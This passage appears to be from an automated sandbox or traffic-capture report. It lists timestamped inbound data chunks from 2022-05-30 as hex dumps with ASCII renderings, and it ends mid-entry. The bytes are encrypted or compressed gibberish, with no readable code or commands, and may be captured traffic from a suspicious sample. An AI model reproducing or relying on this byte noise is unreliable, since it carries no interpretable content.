c2 11 4c c0 f7 16 65 a4 7a 52 ad d7 b9 25 88 ff 93 a9 37 a1 Data Ascii: {ibU9_ISOOD4zcZglhH\sMHf<P3YL3bj)"I{}H('2Hy`PLXH[h]>q\|\synyS'uxE=T"E7LVxD#DDVb\s_Kr2\|=Lu8]9pf$4"%TT!LezR%7
2022-05-30 12:45:08 UTC	236	IN	Data Raw: 0c 09 d5 f0 78 46 39 a7 e5 39 76 53 93 00 5f fa 98 9e c0 68 45 80 c6 e4 78 cf c5 4d 57 0d 6d 1e 29 59 0b 05 1e b0 79 a0 fc a2 e1 5d b4 1a 5a e4 bd 27 50 88 99 00 5b ba 9c e9 1b 97 24 f8 e1 19 63 95 be 48 c7 bd a8 a2 17 6a b1 2a d9 9e 92 77 c3 cc 48 7d 0b 0e 16 bd a0 98 37 92 da 71 b5 47 e9 b4 4d 10 ce 8c a9 f6 11 94 51 72 92 dc 71 94 89 39 ab f5 ca bc a2 04 42 f2 f8 5b f2 0c 9d cc 4a ff 1d df 64 9f ae 71 90 23 ac 9d 30 1b 8a 59 01 a2 77 04 b7 26 ea 69 aa fc 1f 2c 26 95 65 4c 97 6f b2 d4 b5 d4 09 7c ea 4b 6c ea 3e 7e d1 41 ea 68 6f c0 df a7 ed fe e0 41 15 4e 8f 89 ec 4b 02 e5 0a b7 f9 07 b8 ea 14 b2 a0 cc a3 30 4a 95 57 09 01 e4 95 12 b9 20 5e bb ac 7e 3d c0 51 9f ba 8a 15 ca 1e 06 53 42 05 c3 f3 0d aa 16 e1 2c a1 aa 67 7c 92 9c b2 5a 80 02 b0 9e ad 35 ee Data Ascii: xF99vS_hExMWm)Yy]Z'P[$cHj*wH}7qGMQrq9B[Jdq#0Yw&i,&eLo\|Kl>~AhoANK0JW ^~=QSB,g\|Z5
2022-05-30 12:45:08 UTC	237	IN	Data Raw: 25 26 24 42 9d 03 eb b2 86 e8 3f 60 f5 61 6b 0f 65 c6 b7 cc c4 97 c8 65 c4 38 2b 38 a0 c2 55 e2 de a8 fa d3 12 1c 30 98 98 b1 3f 00 ea e8 26 50 01 7f 83 f0 ab d0 e6 23 a5 7e 76 b1 e2 68 d7 2c fe 9f a5 ec 81 25 fe e0 f1 2b e2 be bb 72 26 0e 84 94 6c 11 e7 48 3e a5 73 75 32 89 b9 63 8a e0 15 9b 2d 32 89 87 f8 e3 0e bb f2 c0 11 57 7d 8f 28 82 ab f9 ef 67 3f 13 e9 7f b1 b6 52 29 10 bd b1 a5 ce 5d a8 d1 81 0a f1 92 7c cc bd f3 6b aa 13 23 ad 44 cc 63 d5 bc a8 81 f8 a9 1d 9c 25 6c 5a 87 52 e7 a3 11 88 c4 67 95 0c 08 df 92 9c 41 b5 58 ed c8 66 27 f2 10 55 62 8d 9a e3 9c 62 9e c9 fa cb 13 95 3a f1 14 bf 92 ad 7a 98 81 6d c5 42 35 c7 b1 07 07 e3 5c bb 1a e1 a1 5e f3 2b 54 67 33 9b f5 32 59 68 80 0c 30 22 f5 2a 0f 70 78 43 9f 91 58 fd 16 9b d8 bf f2 3d 47 f2 19 99 Data Ascii: %&$B?`akee8+8U0?&P#~vh,%+r&lH>su2c-2W}(g?R)]\|k#Dc%lZRgAXf'Ubb:zmB5\^+Tg32Yh0"*pxCX=G
2022-05-30 12:45:08 UTC	238	IN	Data Raw: f4 bc 5c 32 cc c3 44 3d a5 93 77 3d ce 6b 3c 58 6e 0d a1 95 a1 6e 56 6a e4 8e 4e 57 97 e4 00 94 98 f8 d7 87 47 97 fd 98 4c fe d3 6b f4 fd 17 97 bd a8 c4 1b 56 a1 37 65 d6 c9 fb 9c 7b 8f cc 96 11 29 6e df 99 86 39 eb 97 b4 e9 dd 42 8a e7 1b e0 bb 29 e6 9b c6 b1 d5 4d 09 41 f6 9d 74 0e e4 90 20 d1 01 aa bb 23 bc 19 48 a6 84 97 d4 82 bb e3 1f 25 eb 86 c4 03 8f a2 01 07 02 6a 97 5b 10 57 64 2e 67 bc 7e 36 a0 c5 69 90 ce f3 61 b2 97 e6 8f da 71 4b 9f 39 44 25 03 da 3e ac 2b d7 c9 b2 8c 33 e8 df 06 24 2f f3 97 b5 de 82 ac 8a cb 4f d9 b0 77 8e 14 8c 32 cf 42 ca ef 48 86 88 79 2c e8 9e 2e 95 46 0d 15 8d 06 57 8e 1b 36 ab 81 2d b3 25 3d ac 36 ea 56 2f a7 31 b0 b5 10 df 75 16 27 ab 8c a4 7b 53 ee ff 8f 14 f7 ff f8 e0 3c af 74 92 bc 65 ea 01 5f e1 86 0a 4a 12 c4 46 Data Ascii: \2D=w=k<XnnVjNWGLkV7e{)n9B)MAt #H%j[Wd.g~6iaqK9D%>+3$/Ow2BHy,.FW6-%=6V/1u'{S<te_JF
2022-05-30 12:45:08 UTC	239	IN	Data Raw: ca 5e 53 fe 5d 3e 3b c5 72 cd 57 11 28 75 c1 62 9f c0 1b 19 37 2e f0 12 ae ba 80 08 3e ea c0 f7 9f 8a 3e 66 a5 b0 94 da f2 9a a1 91 94 76 33 aa a0 f5 3a 39 97 35 f5 b9 2c 78 4f d6 f4 43 2a 42 ad 2d 04 32 9d 14 d5 6f 73 a1 4d 75 97 8a f0 bd 62 e7 f4 a1 69 57 44 0e ec e3 50 02 b3 10 47 2e 57 c0 b3 06 81 df 27 61 1d ce bc 2c b1 e2 be f1 43 a5 29 12 10 e3 0f 96 04 f7 14 c8 66 76 61 40 11 05 f7 f1 9d e3 45 c5 24 a5 3e ba 81 3f 2c 23 36 55 e1 c2 44 32 0b eb 00 87 aa 86 29 37 e7 3f 9a c2 72 53 9c 48 c4 12 bf d7 87 f0 33 e8 e4 46 9b 8b df 8c aa b5 46 48 9c 10 ca 18 98 81 91 29 f1 dc 69 7f fb f9 de 79 d3 07 64 ee 67 fe 57 06 4b 6c 11 42 dd 1c 8c e5 a7 04 3e b2 f8 fc 94 a3 06 29 bd bc ac 91 76 b7 4a 67 b4 b3 ee ba 44 93 e9 fe ad 8d 2d 5d 20 09 76 1b d4 32 7c 75 ae Data Ascii: ^S]>;rW(ub7.>>fv3:95,xOC*B-2osMubiWDPG.W'a,C)fva@E$>?,#6UD2)7?rSH3FFH)iydgWKlB>)vJgD-] v2\|u
2022-05-30 12:45:08 UTC	241	IN	Data Raw: 07 91 ae d8 d4 64 d1 1d 3d 98 8a 44 d1 6d d9 66 94 3c b8 fa 2f 37 69 2d 20 11 17 b9 ec 12 16 d9 8f 47 fc d0 54 49 2f f2 b4 a3 a0 b6 22 47 ff 04 02 dc a7 8f 7f 12 d0 1a 1d db e7 1e 4a ee a1 ce 29 6d 29 d8 dd b7 93 ce 33 02 41 ea 23 e7 0a 15 bb 6d 53 0b 28 34 c7 44 20 f8 bd 9d 93 d0 4b 1b 6f 48 34 30 3b 1f a9 b0 7d 53 ab 4f 56 bf 2a 9c 81 9d 52 d2 75 cc e5 76 65 98 d5 92 3b b1 cd cb c0 d3 e9 39 30 79 9c 42 00 05 cc e8 65 b9 22 5a 95 8d f4 75 0c 20 97 45 5a 49 4d 0b aa 90 b0 53 87 56 43 93 7f f3 51 03 c1 a3 51 e7 61 40 60 e5 13 f5 15 83 e9 4f 2f c5 49 75 48 ed 80 c6 1b 7b f1 c5 4d 16 59 63 10 0d a7 43 00 e1 4f f0 80 db e3 6e 67 43 64 db 5a b5 e7 93 11 38 45 cb ef 54 17 7b 69 41 ec 10 48 35 28 ad a1 76 c2 01 d4 39 46 c6 61 01 55 89 57 cf 52 10 ff 6c 47 0d f0 Data Ascii: d=Dmf</7i- GTI/"GJ)m)3A#mS(4D KoH40;}SOV*Ruve;90yBe"Zu EZIMSVCQQa@`O/IuH{MYcCOngCdZ8ET{iAH5(v9FaUWRlG
2022-05-30 12:45:08 UTC	241	IN	Data Raw: 3c a6 eb 95 7a d2 ca 47 27 8b 61 cb b3 3f da 56 af f4 68 68 4d 8d d7 85 26 5d 1f 82 c0 80 2c 9f b3 67 cf 35 9c 3d ae 92 2c b0 32 8c 4f 61 b4 94 e5 d2 2c 49 2e c8 68 d9 2d 20 29 9c e9 fc 98 16 b9 73 b3 87 ef 69 0c af 0f fb 5d 00 ae f0 bc 79 df f9 8a 2c fd 96 fd d4 9a 1d d9 63 dd 08 9b 10 00 64 6d 0d 83 8c c2 cf 0c 33 c9 f8 cf a6 92 e3 22 83 be ac 50 78 02 f3 89 68 8c 04 de 7b 8a e7 58 6f bd c3 63 b1 99 98 b5 4c 55 15 18 5d 30 96 12 40 df 42 a7 89 38 88 ae 9a e3 d2 e7 28 32 05 34 76 49 7f f5 14 72 02 b9 0d 30 0d b7 3b 7b ce 38 ce 0b 3a 98 78 3c 1a 04 72 f1 e4 6c ad 90 cc 58 fb fe e9 97 f4 b2 cc d6 b9 d6 86 ba a0 43 a0 9c 17 f5 1a bb 14 c6 70 1e 20 7a a1 df aa b2 ee 80 ac e2 aa b8 89 10 21 a2 8c 32 bb 0a b4 f2 87 d3 eb d6 93 be 9c 70 27 72 e9 53 6d 55 e8 d1 Data Ascii: <zG'a?VhhM&],g5=,2Oa,I.h- )si]y,cdm3"Pxh{XocLU]0@B8(24vIr0;{8:x<rlXCp z!2p'rSmU
2022-05-30 12:45:08 UTC	243	IN	Data Raw: a4 88 af 80 28 a0 f2 15 df 67 f4 fd fc 82 ba 02 bb 4f 65 7a 34 78 f1 dd be 88 1d b6 a9 eb 9f 54 ae d9 5e c7 63 e7 ac 03 e9 50 03 9a 7b 18 97 fb ee d4 cd 2e fe 0b 4c ca 43 4c 34 a6 67 75 b7 6c d7 b5 65 30 ed 00 d4 43 18 c2 4e 88 79 df 9c f8 6f 93 a6 c5 8a 38 21 fd 5f 7d 04 0b 18 e7 af 25 78 69 ec 25 69 fe cd 74 8e 78 c9 e2 c1 2c cd 19 b5 02 49 84 ff 47 cd 02 ae 93 d7 90 a3 b2 1c c1 33 31 a6 26 a7 d6 27 95 44 5f 08 e9 9a c5 ec 44 75 4a fd 60 db 6a 16 42 9f dd a1 ef 3c e8 66 0f 0d 9a 9e cd 3e fc d1 b0 81 1f cd 3b c8 f9 72 38 c9 5d 3b a9 6c 3d 2b a0 45 8d dd 31 5d f9 52 db 0e f1 ef d7 28 f4 95 b3 e3 26 1d c9 f4 8c 9e 99 06 b6 54 13 65 eb 22 0f 4e 73 34 4a 3b c2 a8 2c ce 1a 47 ff ac c2 f4 05 f2 6d b4 c0 c7 c4 1f 6e 90 02 cf 69 6a ad 36 e8 06 a9 59 91 42 77 1d Data Ascii: (gOez4xT^cP{.LCL4gule0CNyo8!_}%xi%itx,IG31&'D_DuJ`jB<f>;r8];l=+E1]R(&Te"Ns4J;,Gmnij6YBw
2022-05-30 12:45:08 UTC	244	IN	Data Raw: 9b c5 f0 3b 94 ba a3 99 6f 79 77 ff 33 20 53 d6 bc fb 24 3e bf 8c 99 fa 33 71 ff 87 23 bb 85 dd d8 c5 4d 91 a8 5d 95 2d 29 3c 67 75 39 14 3c ee 70 61 f7 02 44 11 4d 34 61 32 c7 01 e4 b4 6c e1 ea df e9 94 ee 27 f4 b7 7a 59 47 52 68 b9 06 b2 26 9d fc 69 a9 1c 02 78 1c 3c 34 01 6e a6 d9 3b 07 b8 96 83 b7 8f a0 40 20 4a 95 75 9c 02 bc 64 3d 4e 1a b5 cc c6 e7 3d 55 b8 92 da d3 02 6d 3d c1 f2 f9 cc ad d8 f3 df 0a 3a 85 f4 8d f8 c3 0f a3 c4 f8 f7 07 48 19 14 ac 12 25 76 10 0b 9d 98 c3 c3 da f9 59 b4 34 b7 64 2e 1b 75 78 2b d2 e2 9c 5a eb ff 98 ea 89 25 b1 34 58 5a 6d a5 85 18 33 bb 95 bf 07 de cc ad 81 37 81 3d 7b 5c 9e 7d d7 14 56 be 48 62 e7 f6 aa f6 06 ce a1 d9 9f 75 17 71 cc c3 6d db f8 fc 62 c8 40 0b 56 0a 6c 6b d9 78 8c 01 cf 32 63 a1 4f 83 7c 4a d5 7b 5e Data Ascii: ;oyw3 S$>3q#M]-)<gu9<paDM4a2l'zYGRh&ix<4n;@ Jud=N=Um=:H%vY4d.ux+Z%4XZm37={\}VHbuqmb@Vlkx2cO\|J{^
2022-05-30 12:45:08 UTC	245	IN	Data Raw: b8 65 57 47 8b e5 c5 bf a0 0f 19 7b f0 12 2e 57 20 08 c5 42 d4 9f dd ac ea 10 c7 92 3b c9 a2 a8 54 7f 83 fd 58 b3 b0 04 ec a1 a8 e0 a7 dd fa cb 63 0d d0 d8 3f fb ab 47 8d 9b 6f 4d aa bb 90 c9 06 ec 3f 9c 10 f3 f6 10 d1 c2 a8 4c 2c cd 36 ef 5a dd 23 96 c0 89 13 18 ea d1 c1 44 2d 64 cf 9b 75 e2 b4 a4 3d ad 5f 0b c3 00 4f 5a 35 c7 1e ff 4e 4a 5f 66 7f a2 f5 a1 0c 48 13 4f b0 5f 50 7e 15 96 24 5b d9 29 ea a9 71 d3 88 b3 6d 1a 65 7e ac e5 df 9e 42 34 b9 06 81 b4 8f 71 a2 3f 87 ad a3 36 50 29 aa 55 25 f6 a3 78 8b b8 b3 d0 eb d0 4f f6 35 5d 0a b3 e5 5a 11 6a c8 d1 23 23 ff e6 4f 56 4a 48 11 be 85 dc a2 00 c7 8b 55 e4 2c 6e 7f 71 55 91 43 cd 5a 08 fd 30 47 8f bc a9 29 06 19 39 43 33 c1 02 77 fc e6 06 19 1d ae 5d 1d 17 40 9f db 90 1e f7 71 a4 71 6b c6 28 83 f1 f3 Data Ascii: eWG{.W B;TXc?GoM?L,6Z#D-du=_OZ5NJ_fHO_P~$[)qme~B4q?6P)U%xO5]Zj##OVJHU,nqUCZ0G)9C3w]@qqk(
2022-05-30 12:45:08 UTC	246	IN	Data Raw: bc 9a 0a 68 44 d8 a1 2c 81 83 3f 23 e0 7d 18 83 0d 31 38 22 05 07 89 7d 77 a4 64 dc 64 11 68 63 6d 1d ff 0c ce 8b 37 82 69 45 b5 e8 5b bd 3c 50 d6 b3 cf cd 89 af 95 ef b6 c5 55 e1 cb 24 1e 6c 26 b1 52 e7 9a 29 95 b9 16 65 c5 ec 6e e8 a3 c2 60 88 00 5f 6a 4b 67 49 c0 5b 15 b3 23 f5 11 0f 85 ab 14 d0 c5 8d 7b f7 0a df 4c b8 fb 79 b7 2a a1 db c9 c7 d2 5c 0e 4f e4 d9 75 31 4c 77 41 2f ab 17 93 fd 82 60 de 9c ae 59 f0 99 c5 b2 7b 67 ea c9 15 6b d1 0b 77 ff 0a 33 94 c8 c8 49 15 47 30 08 c3 81 84 3f 06 8f 68 d7 95 fe b4 a5 8c 94 46 61 f4 b5 f9 75 56 8e fa d4 8e 69 c8 d9 eb 51 d2 d5 e9 e8 e3 f8 66 b5 ef 85 a8 16 f4 60 d4 f6 3f f8 4b 4f 67 ac 94 19 b6 bf c6 c5 54 a4 82 28 21 9a 8e 74 3e 1b f4 6e a2 84 48 d1 a3 ca 47 39 ce 5c 97 b6 32 4e 3f 79 07 a8 b3 e4 74 81 2b Data Ascii: hD,?#}18"}wddhcm7iE[<PU$l&R)en`_jKgI[#{Ly*\Ou1LwA/`Y{gkw3IG0?hFauViQf`?KOgT(!t>nHG9\2N?yt+
2022-05-30 12:45:08 UTC	248	IN	Data Raw: a1 33 16 69 42 83 6b af 69 bb cd 37 d1 31 61 7f ad 4e 15 88 b7 c4 7f 3d 5f 6f 37 a7 4f f9 c7 6d 67 c4 0b 61 36 ab b2 e1 70 13 eb b5 fb e1 f6 8f ba b7 46 02 ca 55 ac c3 32 82 76 df 3e 7a 97 c9 b6 2e 1d 3b ab 08 38 d8 8b e5 ba 71 d9 a3 5d a5 88 39 f5 96 b9 49 77 54 05 3f 37 49 49 12 3c bf 66 12 30 2c 3a a5 f7 e6 39 ea 8d cf 8c 9c 5a f7 9f c9 62 d1 1c 41 d7 26 4d 15 6b ab 4c 09 4a 41 23 19 07 ba 2f b2 bc 4e 32 cc 12 44 09 85 93 dd 35 ea c5 54 be 14 f7 07 24 a7 5e a2 14 57 0d 40 f2 91 e6 bc cf ed bf 4c 01 ea b7 95 22 47 b0 96 87 79 b8 e7 2c 38 a7 1a 0d b1 2a 66 7b 65 85 00 67 22 d6 32 7b cd 14 e5 24 cc 0d a3 1c d9 23 16 ac 5e 75 e5 07 af cf d6 28 b8 3e 01 ce 41 f6 bd bb 89 24 5e db 1b b9 98 58 0b 28 25 cc 48 c7 4a 7b 0a 2b 7e ce ff 6b 15 0f ca b0 9e c7 d7 15 Data Ascii: 3iBki71aN=_o7Omga6pFU2v>z.;8q]9IwT?7II<f0,:9ZbA&MkLJA#/N2D5T$^W@L"Gy,8*f{eg"2{$#^u(>A$^X(%HJ{+~k
2022-05-30 12:45:08 UTC	249	IN	Data Raw: 15 66 f1 1b 5d 9d 6c 2c 10 fa d1 a3 95 3a da 0c 96 f2 9e c8 24 ea 18 0d f2 8e 41 96 95 4c 05 7e 80 47 92 7a 96 e4 b3 df 46 35 52 58 2c 82 82 e4 0d 30 ba a5 2a ca 2a 87 6f 33 9b 4b 64 74 8d f4 8e d4 d8 06 5f 1e 13 b2 7c 9f 1a 79 7f 0a 1a e3 fd b0 34 f0 f9 d8 ed b3 06 dd 48 fd c5 6f 90 ee 28 aa 9f 7c 71 c3 5b a4 76 53 07 e5 56 1b 81 e5 47 d7 be 78 5a 54 e3 3f 44 43 49 9e c0 4c 1c 3c 4c ac ca b6 fc ca f2 5c 01 a2 3e eb 13 c3 ba 99 c3 fc 06 00 fd 9f 3f d3 e7 bc ac ea 3a 79 d9 8e ef 4a f9 12 39 d6 15 fa 76 7d 7e 80 d8 2a 16 2a d4 80 74 6b 28 8b d7 b4 46 40 c2 32 f4 56 58 c3 af 81 96 a0 43 67 ec d0 c5 75 f3 2c 5a 1e 2a 33 5d 2d 8b ef 03 9d f6 27 89 58 03 cf df 26 a7 79 bb c1 6f bf 42 3a 78 05 53 7c 61 ee ac 08 c9 bc 55 b7 98 eb da 44 e3 83 66 77 69 cb db 6d 71 Data Ascii: f]l,:$AL~GzF5RX,0o3Kdt_\|y4Ho(\|q[vSVGxZT?DCIL<L\>?:yJ9v}~tk(F@2VXCgu,Z*3]-'X&yoB:xS\|aUDfwimq
2022-05-30 12:45:08 UTC	250	IN	Data Raw: 21 9b 42 12 08 a8 dd cc 51 59 cd a5 76 1d 70 eb 24 22 8d 56 c2 f5 44 3c 0d e5 a2 ef bd 97 55 5e 65 3a 9a 89 46 e3 20 7e 78 bb 01 49 e2 f2 49 ef 4c e3 4d 06 f9 f3 15 75 0d 2f 03 89 78 55 a4 82 b9 d4 33 89 8b c8 e0 e7 43 f7 72 b8 54 2f 1e 75 8d 04 fd 64 75 32 36 a8 43 e3 47 86 f9 d4 ca 8c f5 ee e5 1e f9 17 c4 46 fe a2 44 97 79 8b 84 f0 f5 88 75 77 1c 95 ad 9c 01 8b a5 7e 66 b1 49 fb 28 d3 60 14 7b 65 c4 d1 9d ec e1 91 e5 3f 73 8d cf de 7f 92 ef 75 03 57 f3 10 80 fe 5b 8a 0a 15 82 00 13 12 c4 c9 be 3e 10 d2 89 ac 84 06 ac df 8c 3a 91 78 20 01 1b e2 f4 c0 42 d4 1a 96 9c e0 10 48 19 d7 7c 4e ae f8 f6 88 ff 5b 8b b8 17 e8 40 38 af b3 56 30 3b c1 00 2c 00 f5 c6 ab c5 f4 47 c5 2e 02 d3 b5 bd c8 9f a2 9b e0 78 38 30 47 c3 2b 0a af 3a 49 96 d6 14 9d d0 f2 1c 67 4b Data Ascii: !BQYvp$"VD<U^e:F ~xIILMu/xU3CrT/udu26CGFDyuw~fI(`{e?suW[>:x BH\|N[@8V0;,G.x80G+:IgK
2022-05-30 12:45:08 UTC	252	IN	Data Raw: 0d 54 f4 e8 20 7f 35 4c 98 01 9e 38 b4 eb 85 10 e2 aa a0 8d 26 07 4a c3 e1 81 fd 48 19 41 10 3a d8 3a e7 66 2a 88 9b 4b 72 07 ec e0 60 1d f0 79 65 11 e2 a1 8c c3 8c 44 40 93 e0 f5 28 d1 7e bf 78 1f 53 fd cb 44 dd fa a5 4e d1 93 48 a0 7c b3 8f 1b 57 d7 b7 c3 2a 1b 0d 10 57 26 0b f2 96 6f a9 9a 25 0e f4 60 17 6b 18 67 38 64 27 3e ad 97 17 2c 3b 57 2f c8 34 7b 34 c3 10 23 07 cb 93 be f0 9f 90 5e 28 c7 20 06 1e e2 ac f4 00 60 22 28 d5 1f 7b 62 49 92 35 35 3c 3b 30 f6 c8 3a 24 d5 fe 21 5d 16 fe 01 56 60 f8 2f 2e 8c e6 bd 2e 0f fc bd a3 ad 74 96 49 3f c2 b1 e4 15 6d 02 11 6b ae dc d7 35 76 ed 2f ac 3f f2 b1 fb c9 f3 c0 89 d9 20 b2 04 5c fd 8d 4b 75 4c b0 fa f7 89 d8 3a bc bd 2f 1f d5 e1 ab af f1 4a b7 cd 92 28 ca a1 9b f7 95 bd b6 4b fd e9 ce 08 f1 40 a2 5e 62 Data Ascii: T 5L8&JHA::fKr`yeD@(~xSDNH\|WW&o%`kg8d'>,;W/4{4#^( `"({bI55<;0:$!]V`/..tI?mk5v/? \KuL:/J(K@^b
2022-05-30 12:45:08 UTC	253	IN	Data Raw: 78 c8 f0 04 87 c6 5d e5 13 86 2c e6 ed 7d 25 f9 4e 8c 69 68 49 b3 24 8e 01 be 71 9c 3a 6b 32 4d 92 ad de c3 ec 5d ce 5c bd e7 67 df bb ec a2 b2 13 93 fe 45 1d 4f 5d ca 16 73 63 dd 30 d1 47 b1 b5 4f 22 38 52 ff 5d 67 62 a7 7c ce 23 28 fc 02 28 30 52 cd 84 e9 c8 ae 51 6b 65 3e fa a5 4b f9 b4 6f 4b 8a 37 4a e2 1e 6b ae 8d 6d aa d5 b0 ed 47 1d 50 78 3f 03 54 cb 9e dc a9 b9 26 11 76 f2 84 54 6c a9 c4 46 c1 e9 07 7e 96 76 03 49 56 33 83 fe 31 06 c8 63 1c a6 cf 36 56 9d 96 cd 1e 04 fb fa 2d 45 e8 2b 83 9e bc 09 f5 41 db 59 47 64 3b eb 20 b3 7e 3e fc 69 9b 5f 61 a8 f4 f4 3c d8 8e cb 66 cb 7d da eb 94 3b 5d fc fb 07 6e 47 dd bc af bd a8 ec cd f2 b6 2a f7 7f 3d 55 9e 01 ea 46 25 4b 73 f9 37 16 23 b6 ed e5 03 07 25 51 91 be cf 55 5d a1 94 59 dd 1f 3b c2 b5 54 ee 7a Data Ascii: x],}%NihI$q:k2M]\gEO]sc0GO"8R]gb\|#((0RQke>KoK7JkmGPx?T&vTlF~vIV31c6V-E+AYGd; ~>i_a<f};]nG*=UF%Ks7#%QU]Y;Tz
2022-05-30 12:45:08 UTC	254	IN	Data Raw: de 9f b7 6b f0 67 82 79 d0 3b 2f 4c 9e 7c 4b 8c 9b 74 1e b8 a7 bf 89 c0 2b da 2d c8 16 b1 ab 6e 86 3e a5 92 95 9d 59 14 cc 27 59 38 c5 ea 46 cf 22 ff a1 6b 35 1d 34 76 04 6e 59 46 db ad 25 4c 98 75 e9 41 e6 50 3c 27 13 58 c1 8d 72 30 e0 6d b3 6c 94 3c b9 cc 55 9f fe a7 d7 06 b6 ff fc 98 9d 14 25 fd 78 ef 6b 24 b6 f3 b4 a3 dc 34 36 7b f2 31 ee 34 dd 2e c1 42 5f 6f 0d b3 ea 73 c0 34 5e 31 fb e8 d9 67 c3 75 1e 44 b8 bd ad 22 cf 46 7b 0f bb 33 6e 88 5c 73 1a a6 10 88 04 de 18 e5 9a 99 87 3e 25 72 4e 88 ef 86 75 27 41 1d 9c 0b a7 42 36 8c de 90 d8 d0 0d 03 6d f4 1e e7 3e 32 5c cb eb 18 45 1f 97 02 87 52 c3 0b f3 bd ee 55 9b 69 ef 7e bb f4 0c 05 52 cc 1f 5d 8f a6 ad 6f be de 80 ef 95 af fc b6 d8 37 f9 d5 1a 0b c9 83 60 60 d3 02 70 c5 83 22 f2 98 46 06 ad 15 7f Data Ascii: kgy;/L\|Kt+-n>Y'Y8F"k54vnYF%LuAP<'Xr0ml<U%xk$46{14.B_os4^1guD"F{3n\s>%rNu'AB6m>2\ERUi~R]o7``p"F
2022-05-30 12:45:08 UTC	255	IN	Data Raw: 68 9c 74 cc d1 2f c3 fe a8 64 b6 22 4e bc a3 51 fd 25 94 c2 76 eb 9d 12 31 a4 0f 69 6f 72 e7 e5 0c d1 8d 2c a4 e7 8c 99 6f 3b e3 f4 fd 17 fc f8 83 e2 4d e6 b5 cb 78 fd 06 46 48 bf c9 b9 3d 4c 13 28 db 71 36 b8 1c 53 30 16 b3 42 62 1d 30 50 ba 9b 81 25 a8 d1 bb 4d 50 43 74 3e 73 48 a7 d9 ee 98 02 56 eb da 30 2e 8c 65 d2 28 e3 19 03 e3 94 eb e7 b0 33 ff 3d 21 ca f8 e9 10 29 c7 65 56 64 77 b4 fa e5 1c fb cd 43 32 e7 e5 31 80 bc 77 42 36 59 d6 4f 37 c7 25 5e 59 ef d0 f0 29 d7 97 e7 e2 ce ab 26 fe 04 0f a8 ee c0 08 b0 11 30 73 f3 7b c0 02 35 03 ec 57 f8 9b 08 1e 3e 35 f5 d6 35 81 19 42 82 56 0c ec f8 11 4f 04 7e ee f3 21 39 43 b7 a8 a6 62 a0 3e 8d 8e cb 35 09 54 07 a6 64 36 61 5d 16 d1 f9 ef d2 88 81 56 bd e8 84 be ae 2b 3d 0c 9f 67 17 c9 78 6b c9 ff 88 b6 93 Data Ascii: ht/d"NQ%v1ior,o;MxFH=L(q6S0Bb0P%MPCt>sHV0.e(3=!)eVdwC21wB6YO7%^Y)&0s{5W>55BVO~!9Cb>5Td6a]V+=gxk
2022-05-30 12:45:08 UTC	257	IN	Data Raw: c0 ba 01 28 6b ef 0b cb 61 34 5c 88 b9 f3 b7 92 6f b8 6d 37 f0 9e a3 ee dd 73 d6 f0 0e c6 ff 6c 88 36 96 7f 7e 60 dc 37 ea f1 6e e1 f1 be 65 4c 4e d7 11 ab be 0d 73 43 24 08 9d 7e e3 2b af 6f 45 dc e7 b9 4f 9a 53 25 10 cf 0c 2e 75 36 75 ad 0e 23 ea 1c 2d d7 5a 7e 16 61 b1 0f 15 96 de 22 c1 fa 07 96 92 d5 af 1c 1c 2b d2 7c 32 11 b9 93 5e ff 7f e3 5a b8 17 fc 5a 7f 3a 0f db bd 80 7c 0f 7d b8 1a ef 7a 80 24 26 5c 4a 95 32 9b 5f bd 10 ed 44 8f 42 4a 1e 71 a8 8a 1e ea fd 89 3d 41 0a ca 6e 4a 28 2c a3 2d ad 6a 88 d0 a0 4b ba a7 0f 2c a1 96 f1 15 6e 96 9b 43 98 87 9b e6 6f 87 1c fd 61 79 37 73 fe c9 bd 50 a9 6f f7 e0 85 6c 9b 9c 6a f3 9f 8c e5 58 da bd d5 33 b5 af e4 ce 84 23 0c 96 40 cf 6b 08 28 a6 74 d3 7f 34 29 e1 0a 5b 67 48 96 7b 01 fa 60 e5 9e f8 8e d2 92 Data Ascii: (ka4\om7sl6~`7neLNsC$~+oEOS%.u6u#-Z~a"+\|2^ZZ:\|}z$&\J2_DBJq=AnJ(,-jK,nCoay7sPoljX3#@k(t4)[gH{`
2022-05-30 12:45:08 UTC	257	IN	Data Raw: 71 18 8b 3f ce b2 7f 37 63 87 9b 58 21 52 8f 3d ce 45 eb e6 66 d7 c4 38 94 ac b9 a1 0e 35 4a ee ab 7e ee 77 1b 6f 51 8e 61 6c 1f 5c 88 13 87 d0 26 63 f6 a3 c0 2c 50 b7 e0 74 73 d4 f0 fa c6 f7 6b 51 19 6c 1e d2 68 ae 8d 4b f8 1a 71 a0 f0 48 60 af 79 03 ed 15 34 be a6 91 69 f9 7e 49 10 42 2f c1 24 82 f3 ff 34 d0 e9 2a b9 8e d6 da 1b 38 ae e6 98 16 e3 59 30 86 15 62 aa da 6b 11 80 c8 92 c0 39 2d 8f 2e 23 e9 4a 20 5c da a7 a6 d0 c4 91 71 b4 4a 32 5a 77 92 39 f0 f4 a2 d4 ce ea b0 50 92 10 cd fa 94 3b d6 cc e4 66 b5 6a 6b f7 35 bd 10 ed 9b 1a da 30 bc 7e 41 6e 53 71 32 e4 3e f8 c2 11 7b 9e 3c d7 c1 31 7e 9a 08 95 d4 3d f8 6b d2 91 42 64 0b b3 bb bc c5 73 dd 78 30 0a 9c 84 1c 39 71 86 7f cb 9d 26 97 e0 ef 36 f5 27 96 33 c2 15 e0 2a 10 46 28 58 b9 5d 78 73 b1 63 Data Ascii: q?7cX!R=Ef85J~woQal\&c,PtskQlhKqH`y4i~IB/$48Y0bk9-.#J \qJ2Zw9P;fjk50~AnSq2>{<1~=kBdsx09q&6'3F(X]xsc
2022-05-30 12:45:08 UTC	259	IN	Data Raw: 69 92 6d fe 23 0b 45 62 fc ec e8 da 53 e0 26 7f fd d1 8f e2 85 03 54 30 d2 fa df eb 58 c6 c9 38 1d 0a 63 12 b7 26 2b 6d 71 f8 8b 30 2f 6d 38 6f 94 3c b7 7c 30 4c 31 59 99 e2 63 cf 77 9e e9 61 21 ef 71 10 5b 47 0a 05 c8 98 4b 79 33 3d b9 5b 82 73 a7 0c c1 c9 92 0a 96 d9 6d 5b 74 2e e4 a9 10 6d 31 d4 e5 ff 26 b4 fa 03 9e 92 19 db ad 30 3e cc 9e 5d 4e d8 06 05 46 b3 7e dc e6 aa 71 98 6b b5 4f 77 5d 1d ef 86 a6 eb 94 f2 d9 55 67 19 08 c6 d7 12 e9 d7 4a 72 a0 5a 15 60 36 b9 03 cb ae 9b fc 0e 60 40 41 92 43 d0 e4 1f a9 b9 ca b3 48 8d 3b 5a fa fd 97 45 d1 e7 08 40 91 63 b8 9b 8e 3f ad 90 7f f3 da 28 b6 dc 0a 6f 31 80 60 e4 66 30 ac e3 a7 1e 25 1b 00 f9 30 2a 4c 